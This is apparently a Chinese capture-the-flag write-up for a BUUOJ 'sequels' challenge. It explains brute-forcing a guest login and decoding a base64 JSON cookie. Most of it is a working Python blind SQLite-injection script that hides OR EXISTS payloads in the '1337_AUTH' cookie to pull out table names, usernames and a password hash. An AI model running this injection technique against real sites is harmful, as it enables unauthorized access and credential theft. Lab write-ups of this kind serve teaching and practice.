sqlite注入
登录baopo爆破一下得到用户名 guest guest
然后纠结了一会儿,在cookie中发现了
eyJ1c2VybmFtZSI6Imd1ZXN0IiwicGFzc3dvcmQiOiJndWVzdCJ9
这样的文字,解密
{"username":"guest","password":"guest"}
猜测cookie处注入
import requests
import base64
import string
flag = ""
url='http://2d906c68-d6cd-4d37-9337-bd49f2852627.node3.buuoj.cn/sequels'
for i in range(50):
for j in string.printable:
tmp = flag + j
'''
#表名
if j == 'n': continue
if j == 'r': continue
if j == 's': continue
payload = r'{{"username":"\" OR EXISTS(SELECT name FROM sqlite_master WHERE name LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
# table_name notes,reviews,sqlite,uSeRiNfo
'''
'''
#username
if j == 'g': continue
payload = r'{{"username":"\" OR EXISTS(SELECT username FROM userinfo WHERE username LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
#username guest,sequeladmin
'''
#password
payload = r'{{"username":"\" OR EXISTS(SELECT password FROM userinfo WHERE password LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
#password f5ec3af19f0d3679e7d5a148f4ac323d
payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
r = requests.get(url, cookies={"1337_AUTH" : payload})
if "Movie" in r.text:
flag = tmp
print(flag)
break
登录就是flag
对于表来说
CREATE TABLE sqlite_master (
type TEXT, //table
name TEXT, //表名
tbl_name TEXT, //表名
rootpage INTEGER, //不清楚
sql TEXT //建表语句
);